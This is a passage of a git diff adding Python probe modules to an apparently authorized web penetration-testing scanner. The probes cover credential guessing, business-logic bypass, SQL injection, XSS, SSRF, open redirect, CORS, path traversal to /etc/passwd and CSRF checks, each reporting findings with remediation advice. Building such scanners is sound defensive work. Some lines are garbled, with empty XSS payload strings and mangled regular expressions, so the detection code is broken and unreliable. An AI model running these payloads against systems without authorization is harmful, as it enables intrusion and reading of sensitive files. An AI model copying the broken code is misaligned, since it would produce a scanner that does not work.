if session: + successes.append(username) + session.close() + else: + check_session = self.auth.make_anonymous_session() + try: + login_url = self.auth.target_url + self.auth.target_config.login_path + resp = check_session.get(login_url, timeout=10) + body_lower = resp.text.lower() + if resp.status_code == 429 or any(m in body_lower for m in lockout_markers): + self.findings.append(GrayboxFinding( + scenario_id="PT-A07-01", + title="Account lockout detected — weak auth aborted", + status="inconclusive", + severity="INFO", + owasp="A07:2021", + cwe=["CWE-307"], + evidence=[ + f"attempt_count={attempts}", + f"status={resp.status_code}", + ], + )) + return self.findings + except Exception: + pass + finally: + check_session.close() + if attempts >= budget: + break + + if successes: + self.findings.append(GrayboxFinding( + scenario_id="PT-A07-01", + title="Bounded weak-auth simulation", + status="vulnerable", + severity="HIGH", + owasp="A07:2021", + cwe=["CWE-307"], + attack=["T1110"], + evidence=[ + f"attempt_count={attempts}", + f"success_count={len(successes)}", + f"first_success={successes[0]}", + ], + replay_steps=[ + "Run weak-auth simulation with bounded candidate list.", + "Observe successful login using guessed credentials.", + ], + remediation="Enforce strong credential policy, lockout, and throttling controls.", + )) + + return self.findings + + def _test_workflow_bypass(self): + """ + PT-A06-01: test insecure workflow transitions. + + Tests if regular user can access workflow endpoints that should + require elevated permissions or specific state transitions. + + For POST endpoints, includes the CSRF token so that CSRF rejection + doesn't mask a real authorization gap. + """ + if not self.auth.regular_session: + return + + endpoints = self.target_config.business_logic.workflow_endpoints + if not endpoints: + return + + # Resolve {id} placeholders using IDOR test_ids (default: try 1 and 2) + idor_ids = [1, 2] + for iep in self.target_config.access_control.idor_endpoints: + if iep.test_ids: + idor_ids = iep.test_ids + break + + for ep in endpoints: + path = ep.path + if "{id}" in path: + path = path.replace("{id}", str(idor_ids[0])) + self.safety.throttle() + url = self.target_url + path + method = ep.method.upper() + + try: + if method == "POST": + # Fetch the endpoint (or a page that carries CSRF tokens) to get + # a fresh CSRF token — otherwise Django/Rails may return 403 for + # missing CSRF, masking the real authorization check. + csrf_token = None + csrf_field = self.auth.detected_csrf_field + if csrf_field: + csrf_token = self.auth.regular_session.cookies.get("csrftoken") or \ + self.auth.regular_session.cookies.get("csrf_token") + if not csrf_token and csrf_field: + try: + page_resp = self.auth.regular_session.get( + self.target_url + "/", timeout=10, + ) + csrf_token = self.auth.extract_csrf_value( + page_resp.text, csrf_field, + ) + except Exception: + pass + + payload = {} + headers = {"Referer": self.target_url + path} + if csrf_token and csrf_field: + payload[csrf_field] = csrf_token + headers["X-CSRFToken"] = csrf_token + resp = self.auth.regular_session.post( + url, data=payload, headers=headers, timeout=10, + ) + else: + resp = self.auth.regular_session.get(url, timeout=10) + except Exception: + continue + + if resp.status_code < 400: + body_lower = resp.text.lower() + denial_markers = ["access denied", "permission denied", "forbidden", + "not authorized", "unauthorized"] + if any(m in body_lower for m in denial_markers): + continue + + expected = ep.expected_guard + if expected and str(resp.status_code) != expected: + self.findings.append(GrayboxFinding( + scenario_id="PT-A06-01", + title="Workflow bypass — missing authorization guard", + status="vulnerable", + severity="HIGH", + owasp="A06:2021", + cwe=["CWE-841"], + attack=["T1078"], + evidence=[ + f"endpoint={url}", + f"method={method}", + f"expected_guard={expected}", + f"actual_status={resp.status_code}", + ], + replay_steps=[ + "Log in as regular user.", + f"Send {method} to {path}.", + f"Observe status {resp.status_code} instead of expected guard {expected}.", + ], + remediation="Enforce workflow state guards and role checks on all state-changing endpoints.", + )) + + def _test_validation_bypass(self): + """ + PT-A06-02: test business logic validation (negative amounts, invalid state transitions). + + Submits boundary-violating values to record endpoints and checks if the + server accepts them. Tests negative monetary amounts and forbidden state + transitions. + """ + if not self.auth.official_session: + return + + endpoints = self.target_config.business_logic.record_endpoints + if not endpoints: + return + + import re + + idor_ids = [1, 2] + for iep in self.target_config.access_control.idor_endpoints: + if iep.test_ids: + idor_ids = iep.test_ids + break + + bypass_evidence = [] + + for ep in endpoints: + path = ep.path + if "{id}" in path: + path = path.replace("{id}", str(idor_ids[0])) + url = self.target_url + path + + # Step 1: GET the form to extract current state and CSRF token + self.safety.throttle() + try: + page = self.auth.official_session.get(url, timeout=10) + except Exception: + continue + if page.status_code != 200: + continue + + csrf_field = self.auth.detected_csrf_field + csrf_token = None + if csrf_field: + csrf_token = self.auth.extract_csrf_value(page.text, csrf_field) + + # Extract all form fields with current values. + # Parse (any type), ', + page.text, re.I | re.DOTALL, + ): + form_fields[m.group(1)] = m.group(2).strip() + # Extract ', + page.text, re.I | re.DOTALL, + ): + sel_name = sel.group(1) + sel_body = sel.group(2) + opt = re.search(r']*selected[^>]*value=["\']([^"\']+)', sel_body, re.I) + if not opt: + opt = re.search(r']*value=["\']([^"\']+)["\'][^>]*selected', sel_body, re.I) + if opt: + form_fields[sel_name] = opt.group(1) + + current_status = form_fields.get(ep.status_field) + + # Test A: Negative amount + self.safety.throttle() + payload = dict(form_fields) + payload[ep.amount_field] = "-9999.99" + if csrf_token and csrf_field: + payload[csrf_field] = csrf_token + headers = {"Referer": url} + if csrf_token: + headers["X-CSRFToken"] = csrf_token + + try: + resp = self.auth.official_session.post( + url, data=payload, headers=headers, + timeout=10, allow_redirects=False, + ) + except Exception: + resp = None + + if resp is not None: + # Success indicators: 302 redirect (form accepted) or 200 without error + accepted = resp.status_code in (301, 302) + if not accepted and resp.status_code == 200: + body_lower = resp.text.lower() + error_markers = ["must be", "invalid", "error", "cannot", "negative"] + accepted = not any(m in body_lower for m in error_markers) + if accepted: + bypass_evidence.append(f"negative_amount_accepted=True; endpoint={path}") + + # Test B: Invalid state transition (if transitions are configured) + if ep.valid_transitions and current_status: + valid_next = set(ep.valid_transitions.get(current_status, [])) + # Find an invalid target state + all_states = set() + for targets in ep.valid_transitions.values(): + all_states.update(targets) + all_states.update(ep.valid_transitions.keys()) + invalid_states = all_states - valid_next - {current_status} + + if invalid_states: + invalid_target = sorted(invalid_states)[0] + self.safety.throttle() + + # Re-fetch CSRF token (may have been consumed) + if csrf_field: + try: + page2 = self.auth.official_session.get(url, timeout=10) + csrf_token = self.auth.extract_csrf_value(page2.text, csrf_field) + except Exception: + pass + + payload2 = dict(form_fields) + payload2[ep.status_field] = invalid_target + payload2[ep.amount_field] = form_fields.get(ep.amount_field, "100.00") + if csrf_token and csrf_field: + payload2[csrf_field] = csrf_token + headers2 = {"Referer": url} + if csrf_token: + headers2["X-CSRFToken"] = csrf_token + + try: + resp2 = self.auth.official_session.post( + url, data=payload2, headers=headers2, + timeout=10, allow_redirects=False, + ) + except Exception: + resp2 = None + + if resp2 is not None: + accepted2 = resp2.status_code in (301, 302) + if not accepted2 and resp2.status_code == 200: + body_lower = resp2.text.lower() + error_markers = ["must be", "invalid", "error", "cannot", "blocked", "transition"] + accepted2 = not any(m in body_lower for m in error_markers) + if accepted2: + bypass_evidence.append( + f"invalid_transition_accepted=True; " + f"from={current_status}; to={invalid_target}; endpoint={path}" + ) + + if bypass_evidence: + self.findings.append(GrayboxFinding( + scenario_id="PT-A06-02", + title="Business logic validation bypass", + status="vulnerable", + severity="HIGH", + owasp="A06:2021", + cwe=["CWE-20", "CWE-840"], + attack=["T1190"], + evidence=bypass_evidence, + replay_steps=[ + "Log in as authenticated user.", + "Submit form with negative amount or invalid state transition.", + "Observe server accepts the invalid input.", + ], + remediation="Enforce server-side validation for monetary amounts (>= 0) " + "and business state machine transitions. " + "Never rely on client-side validation alone.", + )) + elif endpoints: + self.findings.append(GrayboxFinding( + scenario_id="PT-A06-02", + title="Business logic validation — no bypass detected", + status="not_vulnerable", + severity="INFO", + owasp="A06:2021", + evidence=[f"endpoints_tested={len(endpoints)}"], + )) diff --git a/extensions/business/cybersec/red_mesh/graybox/probes/injection.py b/extensions/business/cybersec/red_mesh/graybox/probes/injection.py new file mode 100644 index 00000000..1326881d --- /dev/null +++ b/extensions/business/cybersec/red_mesh/graybox/probes/injection.py @@ -0,0 +1,589 @@ +""" +Injection probes — A03 + A05 + API7. +""" + +import re + +from .base import ProbeBase +from ..findings import GrayboxFinding + + +class InjectionProbes(ProbeBase): + """ + PT-A05-01: controlled injection on login form. + PT-A03-01: authenticated injection on discovered forms. + PT-A03-02: stored XSS (stateful — gated). + PT-API7-01: SSRF checks on URL-fetch endpoints. + """ + + requires_auth = True + requires_regular_session = False + is_stateful = False + + def run(self): + self.run_safe("login_injection", self._test_login_injection) + if self.auth.official_session: + self.run_safe("authenticated_injection", self._test_authenticated_injection) + if self._allow_stateful: + self.run_safe("stored_xss", self._test_stored_xss) + else: + self.findings.append(GrayboxFinding( + scenario_id="PT-A03-02", + title="Stored XSS probe skipped: stateful probes disabled", + status="inconclusive", + severity="INFO", + owasp="A03:2021", + evidence=["stateful_probes_disabled=True", + "reason=stored_xss_writes_data_to_target"], + )) + self.run_safe("ssrf", self._test_ssrf) + self.run_safe("open_redirect", self._test_open_redirect) + if self.auth.official_session: + self.run_safe("path_traversal", self._test_path_traversal) + return self.findings + + def _test_login_injection(self): + """PT-A05-01: inject into login form fields (unauthenticated).""" + session = self.auth.make_anonymous_session() + login_url = self.target_url + self.target_config.login_path + + payloads = [ + ("xss", '', "CWE-79"), + ("sqli", "' OR '1'='1", "CWE-89"), + ] + + try: + page = session.get(login_url, timeout=10) + except Exception: + session.close() + return + + # Extract CSRF token if present + csrf_field = self.auth.detected_csrf_field + csrf_token = None + if csrf_field: + csrf_token = self.auth.extract_csrf_value(page.text, csrf_field) + + vulnerable = [] + for label, payload, cwe in payloads: + self.safety.throttle() + form_data = { + self.target_config.username_field: payload, + self.target_config.password_field: "test", + } + if csrf_token and csrf_field: + form_data[csrf_field] = csrf_token + + try: + resp = session.post(login_url, data=form_data, timeout=10) + except Exception: + continue + + # Check for reflection + if payload in resp.text: + vulnerable.append((label, cwe, payload)) + + session.close() + + if vulnerable: + for label, cwe, payload in vulnerable: + self.findings.append(GrayboxFinding( + scenario_id="PT-A05-01", + title=f"Reflected {label.upper()} in login form", + status="vulnerable", + severity="HIGH" if label == "sqli" else "MEDIUM", + owasp="A05:2021" if label == "sqli" else "A03:2021", + cwe=[cwe], + evidence=[ + f"endpoint={login_url}", + f"field={self.target_config.username_field}", + f"payload={payload}", + "payload_reflected=True", + ], + replay_steps=[ + f"Submit {payload} in the username field of {self.target_config.login_path}.", + "Observe payload reflected in the response.", + ], + remediation="Apply input validation and output encoding on all form fields.", + )) + else: + self.findings.append(GrayboxFinding( + scenario_id="PT-A05-01", + title="Login form injection — no reflection detected", + status="not_vulnerable", + severity="INFO", + owasp="A05:2021", + evidence=[f"payloads_tested={len(payloads)}"], + )) + + def _test_authenticated_injection(self): + """ + PT-A03-01: inject into authenticated form fields. + + Tests each discovered form's text inputs with XSS/SQLi payloads. + Skips login form (already tested by _test_login_injection). + """ + if not self.discovered_forms: + return + + payloads = [ + ("xss", "", "CWE-79"), + ("sqli", "' OR '1'='1", "CWE-89"), + ] + login_path = self.target_config.login_path + tested = 0 + vulnerable_forms = [] + + for form_action in self.discovered_forms: + if form_action == login_path: + continue + self.safety.throttle() + url = self.target_url + form_action + + try: + page = self.auth.official_session.get(url, timeout=10) + except Exception: + continue + + # Extract input field names + input_names = re.findall( + r']+name=["\']([^"\']+)["\'][^>]*type=["\']?text', + page.text, re.IGNORECASE, + ) + textarea_names = re.findall( + r']+name=["\']([^"\']+)["\']', + page.text, re.IGNORECASE, + ) + all_inputs = input_names + textarea_names + if not all_inputs: + continue + + # Include CSRF token + csrf_field = self.auth.detected_csrf_field + csrf_token = None + if csrf_field: + csrf_token = self.auth.extract_csrf_value(page.text, csrf_field) + + for label, payload, cwe in payloads: + self.safety.throttle() + form_data = {name: payload for name in all_inputs} + if csrf_token and csrf_field: + form_data[csrf_field] = csrf_token + + try: + resp = self.auth.official_session.post(url, data=form_data, timeout=10) + except Exception: + continue + tested += 1 + + if payload in resp.text: + vulnerable_forms.append((form_action, label, cwe, all_inputs[0])) + + for form_action, label, cwe, field in vulnerable_forms: + self.findings.append(GrayboxFinding( + scenario_id="PT-A03-01", + title=f"Reflected {label.upper()} in authenticated form", + status="vulnerable", + severity="HIGH" if label == "sqli" else "MEDIUM", + owasp="A03:2021", + cwe=[cwe], + evidence=[ + f"endpoint={self.target_url + form_action}", + f"field={field}", + "payload_reflected=True", + ], + replay_steps=[ + "Log in as authenticated user.", + f"Submit payload in {field} at {form_action}.", + "Observe payload reflected in the response.", + ], + remediation="Apply input validation and output encoding on all form fields.", + )) + + if tested > 0 and not vulnerable_forms: + self.findings.append(GrayboxFinding( + scenario_id="PT-A03-01", + title="Authenticated injection — no reflection detected", + status="not_vulnerable", + severity="INFO", + owasp="A03:2021", + evidence=[f"forms_tested={tested}"], + )) + + def _test_stored_xss(self): + """ + PT-A03-02: stored XSS via authenticated form submission. + + Submits canary payload via POST to text inputs, then reads back + via GET to detect unescaped reflection. Gated behind allow_stateful. + """ + if not self.discovered_forms: + return + + import uuid + canary = f"XSS-CANARY-{uuid.uuid4().hex[:8]}" + payload = f"" + skip_paths = {self.target_config.login_path, self.target_config.logout_path} + + tested = 0 + for form_action in self.discovered_forms[:3]: + if form_action in skip_paths: + continue + self.safety.throttle() + url = self.target_url + form_action + + try: + page = self.auth.official_session.get(url, timeout=10) + except Exception: + continue + + input_names = re.findall( + r']+name=["\']([^"\']+)["\'][^>]*type=["\']?text', + page.text, re.IGNORECASE, + ) + textarea_names = re.findall( + r']+name=["\']([^"\']+)["\']', + page.text, re.IGNORECASE, + ) + all_inputs = input_names + textarea_names + if not all_inputs: + continue + + form_data = {name: payload for name in all_inputs} + csrf_field = self.auth.detected_csrf_field + if csrf_field: + csrf_token = self.auth.extract_csrf_value(page.text, csrf_field) + if csrf_token: + form_data[csrf_field] = csrf_token + + try: + self.auth.official_session.post(url, data=form_data, timeout=10) + except Exception: + continue + tested += 1 + + self.safety.throttle() + try: + readback = self.auth.official_session.get(url, timeout=10) + except Exception: + continue + + if canary in readback.text and payload in readback.text: + self.findings.append(GrayboxFinding( + scenario_id="PT-A03-02", + title="Stored cross-site scripting (XSS)", + status="vulnerable", + severity="HIGH", + owasp="A03:2021", + cwe=["CWE-79"], + attack=["T1059.007"], + evidence=[ + f"endpoint={url}", + f"input_fields={', '.join(all_inputs)}", + f"canary={canary}", + "payload_reflected_unescaped=True", + ], + replay_steps=[ + "Log in as authenticated user.", + f"POST XSS payload to {form_action} in field {all_inputs[0]}.", + f"GET {form_action} and observe unescaped payload in response.", + ], + remediation="Apply output encoding on all user-supplied content. " + "Use Content-Security-Policy to mitigate impact.", + )) + return + + if tested > 0: + self.findings.append(GrayboxFinding( + scenario_id="PT-A03-02", + title="Stored XSS — no vulnerability detected", + status="not_vulnerable", + severity="INFO", + owasp="A03:2021", + evidence=[f"forms_tested={tested}"], + )) + + def _test_ssrf(self): + """ + PT-API7-01: SSRF checks on URL-fetch endpoints. + + Tests configured endpoints for server-side URL fetching. + Detects reflected SSRF and timing-based hints for blind SSRF. + """ + ssrf_endpoints = self.target_config.injection.ssrf_endpoints + if not ssrf_endpoints: + return + + import time as _time + payload_url = "http://127.0.0.1:1/internal-probe" + baseline_url = "http://example.invalid/nonexistent" + + for ep in ssrf_endpoints: + self.safety.throttle() + url = self.target_url + "/" + ep.path.lstrip("/") + session = self.auth.official_session or self.auth.anon_session + + try: + t0 = _time.monotonic() + session.get(url, params={ep.param: baseline_url}, timeout=10) + baseline_ms = (_time.monotonic() - t0) * 1000 + except Exception: + continue + + try: + t0 = _time.monotonic() + resp = session.get(url, params={ep.param: payload_url}, timeout=10) + probe_ms = (_time.monotonic() - t0) * 1000 + except Exception: + continue + + if resp.status_code == 200 and "internal-probe" in resp.text: + self.findings.append(GrayboxFinding( + scenario_id="PT-API7-01", + title="Server-side request forgery", + status="vulnerable", + severity="MEDIUM", + owasp="API7:2023", + cwe=["CWE-918"], + attack=["T1190"], + evidence=[ + f"endpoint={url}", + f"payload={payload_url}", + f"status={resp.status_code}", + ], + replay_steps=[ + f"Request GET {ep.path} with {ep.param}={payload_url}.", + "Observe server-side fetch of local callback URL.", + ], + remediation="Apply strict outbound URL allowlists and block local network ranges.", + )) + return + + if probe_ms > baseline_ms + 2000: + self.findings.append(GrayboxFinding( + scenario_id="PT-API7-01", + title="Possible blind SSRF (timing anomaly)", + status="inconclusive", + severity="LOW", + owasp="API7:2023", + cwe=["CWE-918"], + attack=["T1190"], + evidence=[ + f"endpoint={url}", + f"probe_ms={probe_ms:.0f}", + f"baseline_ms={baseline_ms:.0f}", + ], + replay_steps=[ + f"Request GET {ep.path} with {ep.param}={payload_url}.", + "Compare response time against baseline with non-routable URL.", + ], + remediation="Investigate with out-of-band callback to confirm blind SSRF.", + )) + return + + def _test_open_redirect(self): + """ + PT-A01-04: test URL parameters for open redirect vulnerabilities. + + Tests common redirect parameter names (next, url, redirect, return_to, + continue, dest, goto, forward) with an external domain payload. + Checks if the response issues a redirect to the attacker-controlled domain. + + Read-only: only sends GET requests with modified query parameters. + """ + session = self.auth.official_session or self.auth.anon_session + if not session: + return + + redirect_params = [ + "next", "url", "redirect", "redirect_url", "return_to", "return", + "continue", "dest", "destination", "goto", "forward", "redir", + "returnUrl", "redirect_uri", "callback", + ] + payload = "//evil.example.com" + payload_alt = "https://evil.example.com" + + # Test against: login page (common redirect after login), discovered routes + test_paths = [self.target_config.login_path, self.target_config.logout_path] + for route in self.discovered_routes: + test_paths.append(route) + # Deduplicate + seen = set() + unique_paths = [] + for p in test_paths: + if p and p not in seen: + seen.add(p) + unique_paths.append(p) + + tested = 0 + vulnerable_evidence = [] + + for path in unique_paths[:10]: # cap to avoid excessive requests + for param in redirect_params: + self.safety.throttle() + url = self.target_url + path + try: + resp = session.get( + url, params={param: payload}, + timeout=10, allow_redirects=False, + ) + except Exception: + continue + tested += 1 + + # Check for redirect to evil domain + if resp.status_code in (301, 302, 303, 307, 308): + location = resp.headers.get("Location", "") + if "evil.example.com" in location: + vulnerable_evidence.append( + f"endpoint={path}; param={param}; location={location}" + ) + break # one redirect per path is enough + + # Also test the alternate payload (full URL) + if not vulnerable_evidence or vulnerable_evidence[-1].split(";")[0] != f"endpoint={path}": + self.safety.throttle() + try: + resp2 = session.get( + url, params={param: payload_alt}, + timeout=10, allow_redirects=False, + ) + except Exception: + continue + tested += 1 + + if resp2.status_code in (301, 302, 303, 307, 308): + location2 = resp2.headers.get("Location", "") + if "evil.example.com" in location2: + vulnerable_evidence.append( + f"endpoint={path}; param={param}; location={location2}" + ) + break + + if len(vulnerable_evidence) >= 3: + break # enough evidence + + if vulnerable_evidence: + self.findings.append(GrayboxFinding( + scenario_id="PT-A01-04", + title="Open redirect via URL parameter", + status="vulnerable", + severity="MEDIUM", + owasp="A01:2021", + cwe=["CWE-601"], + attack=["T1566"], + evidence=vulnerable_evidence, + replay_steps=[ + "Navigate to the vulnerable endpoint with redirect parameter.", + f"Set parameter to {payload} or {payload_alt}.", + "Observe 3xx redirect to attacker-controlled domain.", + ], + remediation="Validate redirect targets against a server-side allowlist. " + "Use relative paths only, or verify the destination host " + "matches your domain. Never pass user input directly to " + "Location headers.", + )) + elif tested > 0: + self.findings.append(GrayboxFinding( + scenario_id="PT-A01-04", + title="Open redirect — no vulnerability detected", + status="not_vulnerable", + severity="INFO", + owasp="A01:2021", + evidence=[f"parameters_tested={tested}"], + )) + + def _test_path_traversal(self): + """ + PT-A03-03: test parameters for directory traversal vulnerabilities. + + Tests query parameters and path segments in discovered routes with + path traversal payloads. Checks response body for OS file content + markers (e.g. root:x: from /etc/passwd). + + Read-only: only sends GET requests with modified parameters. + """ + session = self.auth.official_session + if not session: + return + + traversal_payloads = [ + ("../../../../../../etc/passwd", ["root:x:", "root:*:", "daemon:", "nobody:"]), + ("..\\..\\..\\..\\..\\..\\windows\\win.ini", ["[extensions]", "[fonts]", "[mci extensions]"]), + ("....//....//....//....//etc/passwd", ["root:x:", "root:*:"]), # filter bypass + ] + # Common parameter names that might accept file paths + file_params = [ + "file", "path", "page", "doc", "document", "template", "include", + "name", "folder", "dir", "download", "filename", "filepath", + "view", "content", "layout", "resource", + ] + + # Collect routes that have query-like structure or path parameters + test_routes = [] + for route in self.discovered_routes: + test_routes.append(route) + # Always test the root as well + if "/" not in test_routes: + test_routes.append("/") + + tested = 0 + vulnerable_evidence = [] + + for route in test_routes[:10]: # cap to avoid excessive requests + url = self.target_url + route + + # Strategy 1: inject via query parameters + for param in file_params: + if tested > 60: + break # hard cap on total requests + for payload, markers in traversal_payloads: + self.safety.throttle() + try: + resp = session.get(url, params={param: payload}, timeout=10) + except Exception: + continue + tested += 1 + + if resp.status_code == 200: + body = resp.text + if any(m in body for m in markers): + vulnerable_evidence.append( + f"endpoint={route}; param={param}; payload={payload}" + ) + break # one hit per route+param is enough + if vulnerable_evidence: + break # found a hit on this route, move on + + if len(vulnerable_evidence) >= 3: + break + + if vulnerable_evidence: + self.findings.append(GrayboxFinding( + scenario_id="PT-A03-03", + title="Path traversal — file content disclosed", + status="vulnerable", + severity="HIGH", + owasp="A03:2021", + cwe=["CWE-22"], + attack=["T1083"], + evidence=vulnerable_evidence, + replay_steps=[ + "Log in as authenticated user.", + f"Request GET with traversal payload in file parameter.", + "Observe OS file contents (e.g. /etc/passwd) in response body.", + ], + remediation="Validate and sanitize all file path inputs server-side. " + "Use a whitelist of allowed files, canonicalize paths, " + "and ensure they stay within the application's base directory. " + "Never pass user input directly to file system operations.", + )) + elif tested > 0: + self.findings.append(GrayboxFinding( + scenario_id="PT-A03-03", + title="Path traversal — no vulnerability detected", + status="not_vulnerable", + severity="INFO", + owasp="A03:2021", + evidence=[f"requests_tested={tested}"], + )) diff --git a/extensions/business/cybersec/red_mesh/graybox/probes/misconfig.py b/extensions/business/cybersec/red_mesh/graybox/probes/misconfig.py new file mode 100644 index 00000000..f34473c8 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/graybox/probes/misconfig.py @@ -0,0 +1,856 @@ +""" +Security misconfiguration probes — A02 debug/CORS/headers/cookies/CSRF/session. +""" + +from .base import ProbeBase +from ..findings import GrayboxFinding + + +class MisconfigProbes(ProbeBase): + """PT-A02-01..06: debug exposure, CORS, headers, cookies, CSRF bypass, session token.""" + + requires_auth = False + requires_regular_session = False + is_stateful = False + + def run(self): + self.run_safe("debug_exposure", self._test_debug_exposure) + self.run_safe("cors", self._test_cors) + self.run_safe("security_headers", self._test_security_headers) + self.run_safe("cookie_attributes", self._test_cookie_attributes) + self.run_safe("csrf_bypass", self._test_csrf_bypass) + self.run_safe("session_token", self._test_session_token) + self.run_safe("login_rate_limiting", self._test_login_rate_limiting) + self.run_safe("password_reset_token", self._test_password_reset_token) + self.run_safe("session_fixation", self._test_session_fixation) + self.run_safe("account_enumeration", self._test_account_enumeration) + return self.findings + + def _test_debug_exposure(self): + """PT-A02-01: check debug/config endpoints for information disclosure.""" + session = self.auth.anon_session or self.auth.official_session + if not session: + return + + debug_paths = self.target_config.misconfig.debug_paths + exposed = [] + for path in debug_paths: + self.safety.throttle() + url = self.target_url + path + try: + resp = session.get(url, timeout=10) + except Exception: + continue + if resp.status_code == 200 and len(resp.text) > 50: + exposed.append(path) + + if exposed: + self.findings.append(GrayboxFinding( + scenario_id="PT-A02-01", + title="Debug/config endpoint exposed", + status="vulnerable", + severity="MEDIUM", + owasp="A02:2021", + cwe=["CWE-200"], + evidence=[f"exposed_paths={', '.join(exposed)}"], + remediation="Disable debug endpoints in production. Restrict access by IP or authentication.", + )) + else: + self.findings.append(GrayboxFinding( + scenario_id="PT-A02-01", + title="Debug endpoints — not exposed", + status="not_vulnerable", + severity="INFO", + owasp="A02:2021", + evidence=[f"paths_tested={len(debug_paths)}"], + )) + + def _test_cors(self): + """PT-A02-02: check for permissive CORS configuration. + + Tests both the root URL and discovered API routes, since many apps + only set CORS headers on API endpoints (e.g. /api/*). + """ + session = self.auth.anon_session or self.auth.official_session + if not session: + return + + # Build candidate URLs: root + configured endpoints + discovered API routes. + # Many apps only set CORS headers on API routes, so we must test those too. + test_paths = ["/"] + # Add configured endpoints (IDOR, admin, workflow) — these are known API paths + for ep in self.target_config.access_control.idor_endpoints: + test_paths.append(ep.path.replace("{id}", "1")) + for ep in self.target_config.access_control.admin_endpoints: + test_paths.append(ep.path) + for ep in self.target_config.business_logic.workflow_endpoints: + test_paths.append(ep.path.replace("{id}", "1")) + # Add discovered API-like routes + for route in self.discovered_routes: + if "/api/" in route.lower(): + test_paths.append(route) + # Deduplicate while preserving order + seen = set() + unique_paths = [] + for p in test_paths: + if p not in seen: + seen.add(p) + unique_paths.append(p) + + worst_finding = None + for path in unique_paths: + self.safety.throttle() + try: + resp = session.get( + self.target_url + path, + headers={"Origin": "http://evil.example.com"}, + timeout=10, + allow_redirects=False, + ) + except Exception: + continue + + acao = resp.headers.get("Access-Control-Allow-Origin", "") + acac = resp.headers.get("Access-Control-Allow-Credentials", "").lower() + + if acao == "*": + finding = GrayboxFinding( + scenario_id="PT-A02-02", + title="Permissive CORS: wildcard origin", + status="vulnerable", + severity="HIGH" if acac == "true" else "MEDIUM", + owasp="A02:2021", + cwe=["CWE-942"], + evidence=[ + f"path={path}", + f"access_control_allow_origin={acao}", + f"allow_credentials={acac}", + ], + remediation="Restrict Access-Control-Allow-Origin to trusted domains. Never use * with credentials.", + ) + if not worst_finding or finding.severity == "HIGH": + worst_finding = finding + elif acao == "http://evil.example.com": + severity = "HIGH" if acac == "true" else "MEDIUM" + finding = GrayboxFinding( + scenario_id="PT-A02-02", + title="CORS reflects arbitrary origin", + status="vulnerable", + severity=severity, + owasp="A02:2021", + cwe=["CWE-942"], + evidence=[ + f"path={path}", + f"access_control_allow_origin={acao}", + f"allow_credentials={acac}", + ], + remediation="Validate the Origin header against an allowlist. Do not reflect arbitrary origins.", + ) + if not worst_finding or severity == "HIGH": + worst_finding = finding + + if worst_finding: + self.findings.append(worst_finding) + else: + self.findings.append(GrayboxFinding( + scenario_id="PT-A02-02", + title="CORS configuration — no misconfiguration detected", + status="not_vulnerable", + severity="INFO", + owasp="A02:2021", + evidence=[f"paths_tested={len(unique_paths)}"], + )) + + def _test_security_headers(self): + """PT-A02-03: check for missing security headers.""" + session = self.auth.anon_session or self.auth.official_session + if not session: + return + + self.safety.throttle() + try: + resp = session.get(self.target_url + "/", timeout=10) + except Exception: + return + + headers = resp.headers + missing = [] + checked = [ + "X-Frame-Options", + "X-Content-Type-Options", + "Strict-Transport-Security", + "Content-Security-Policy", + "X-XSS-Protection", + ] + for h in checked: + if h.lower() not in {k.lower(): k for k in headers}: + missing.append(h) + + if missing: + self.findings.append(GrayboxFinding( + scenario_id="PT-A02-03", + title="Missing security headers", + status="vulnerable", + severity="LOW", + owasp="A02:2021", + cwe=["CWE-693"], + evidence=[f"missing_headers={', '.join(missing)}"], + remediation="Add security headers: " + ", ".join(missing), + )) + else: + self.findings.append(GrayboxFinding( + scenario_id="PT-A02-03", + title="Security headers — all present", + status="not_vulnerable", + severity="INFO", + owasp="A02:2021", + evidence=[f"headers_checked={len(checked)}"], + )) + + def _test_cookie_attributes(self): + """PT-A02-04: check session cookie security attributes.""" + if not self.auth.official_session: + return + + cookies = self.auth.official_session.cookies + issues = [] + for cookie in cookies: + if not cookie.secure: + issues.append(f"{cookie.name}:missing_Secure") + if not cookie.has_nonstandard_attr("HttpOnly"): + issues.append(f"{cookie.name}:missing_HttpOnly") + samesite = cookie.get_nonstandard_attr("SameSite") + if not samesite or samesite.lower() == "none": + issues.append(f"{cookie.name}:weak_SameSite={samesite or 'absent'}") + + if issues: + self.findings.append(GrayboxFinding( + scenario_id="PT-A02-04", + title="Insecure cookie attributes", + status="vulnerable", + severity="LOW", + owasp="A02:2021", + cwe=["CWE-614"], + evidence=issues, + remediation="Set Secure, HttpOnly, and SameSite=Strict on all session cookies.", + )) + else: + self.findings.append(GrayboxFinding( + scenario_id="PT-A02-04", + title="Cookie attributes — all secure", + status="not_vulnerable", + severity="INFO", + owasp="A02:2021", + evidence=["all_cookies_have_secure_attributes"], + )) + + def _test_csrf_bypass(self): + """ + PT-A02-05: test if CSRF protection is enforced on state-changing endpoints. + + Submit POST without CSRF token to state-changing endpoints. + If the server accepts → CSRF bypass detected. + """ + if not self.auth.official_session: + return + + csrf_test_endpoints = [] + for ep in self.target_config.business_logic.workflow_endpoints: + path = ep.path.replace("{id}", "1") if "{id}" in ep.path else ep.path + csrf_test_endpoints.append(path) + for form in self.discovered_forms: + if form == self.target_config.login_path: + continue + csrf_test_endpoints.append(form) + + if not csrf_test_endpoints: + return + + tested = 0 + vulnerable_endpoints = [] + for path in csrf_test_endpoints[:5]: + self.safety.throttle() + url = self.target_url + path + try: + resp = self.auth.official_session.post( + url, data={"test": "csrf_probe"}, timeout=10, + headers={"Referer": "http://evil.example.com"}, + ) + except Exception: + continue + tested += 1 + body_lower = resp.text.lower() + csrf_rejected = any(m in body_lower for m in [ + "csrf", "forbidden", "token", "invalid request", + ]) or resp.status_code == 403 + if not csrf_rejected and resp.status_code < 400: + vulnerable_endpoints.append(path) + + if vulnerable_endpoints: + self.findings.append(GrayboxFinding( + scenario_id="PT-A02-05", + title="CSRF protection bypass", + status="vulnerable", + severity="HIGH", + owasp="A02:2021", + cwe=["CWE-352"], + attack=["T1185"], + evidence=[ + f"endpoints_without_csrf={', '.join(vulnerable_endpoints)}", + f"endpoints_tested={tested}", + ], + replay_steps=[ + "Log in as authenticated user.", + f"POST to {vulnerable_endpoints[0]} without CSRF token.", + "Observe request accepted despite missing CSRF protection.", + ], + remediation="Enforce CSRF tokens on all state-changing endpoints. " + "Use SameSite=Strict cookies as defense-in-depth.", + )) + elif tested > 0: + self.findings.append(GrayboxFinding( + scenario_id="PT-A02-05", + title="CSRF protection — no bypass detected", + status="not_vulnerable", + severity="INFO", + owasp="A02:2021", + evidence=[f"endpoints_tested={tested}"], + )) + + def 